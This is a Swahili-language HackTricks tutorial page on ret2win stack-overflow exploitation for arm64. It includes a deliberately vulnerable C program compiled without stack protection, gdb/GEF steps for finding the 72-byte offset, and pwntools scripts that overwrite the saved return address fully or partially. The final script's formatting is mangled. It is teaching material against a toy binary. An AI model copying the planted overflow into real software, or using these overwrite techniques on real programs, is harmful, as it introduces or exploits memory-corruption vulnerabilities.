Ret2win - arm64

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

Pata utangulizi wa arm64 katika:

Introduction to ARM64v8

Code

#include <stdio.h>
#include <unistd.h>

void win() {
printf("Congratulations!\n");
}

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Kusanya bila pie na canary:

clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie

Kupata offset

Chaguo la muundo

Mfano huu ulitengenezwa kwa kutumia GEF:

Anza gdb na gef, tengeneza muundo na uvitumie:

gdb -q ./ret2win
pattern create 200
run

arm64 itajaribu kurudi kwenye anwani katika register x30 (ambayo ilikabiliwa), tunaweza kutumia hiyo kupata ofseti ya muundo:

pattern search $x30

Kipimo ni 72 (9x48).

Chaguo la kipimo cha stack

Anza kwa kupata anwani ya stack ambapo register ya pc imehifadhiwa:

gdb -q ./ret2win
b *vulnerable_function + 0xc
run
info frame

Sasa weka breakpoint baada ya read() na endelea hadi read() itakapotekelezwa na weka muundo kama 13371337:

b *vulnerable_function+28
c

Pata mahali ambapo muundo huu umehifadhiwa katika kumbukumbu:

Kisha: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72

Hakuna PIE

Kawaida

Pata anwani ya kazi ya win:

objdump -d ret2win | grep win
ret2win:     file format elf64-littleaarch64
00000000004006c4 <win>:

Kuvunja:

from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Off-by-1

Kwa kweli hii itakuwa kama off-by-2 katika PC iliyohifadhiwa kwenye stack. Badala ya kufuta anwani zote za kurudi, tutafuta tu byte 2 za mwisho kwa 0x06c4.

from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Unaweza kupata mfano mwingine wa off-by-one katika ARM64 katika https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/, ambayo ni off-by-one halisi katika udhaifu wa kufikirika.

Pamoja na PIE

Tengeneza binary bila ya argumenti -no-pie

Off-by-2

Bila leak hatujui anwani halisi ya kazi ya kushinda lakini tunaweza kujua offset ya kazi kutoka kwa binary na kujua kwamba anwani ya kurudi tunayoshughulikia tayari inaelekeza kwenye anwani ya karibu, inawezekana kuvuja offset kwa kazi ya kushinda (0x7d4) katika kesi hii na kutumia tu offset hiyo:

```python from pwn import *

Configuration

binary_name = './ret2win' p = process(binary_name)

Prepare the payload

offset = 72 ret2win_addr = p16(0x07d4) payload = b'A' * offset + ret2win_addr

Send the payload

p.send(payload)

Check response

print(p.recvline()) p.close()


<div data-gb-custom-block data-tag="hint" data-style='success'>

Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

</div>

PreviousRet2win NextStack Shellcode

Last updated 4 months ago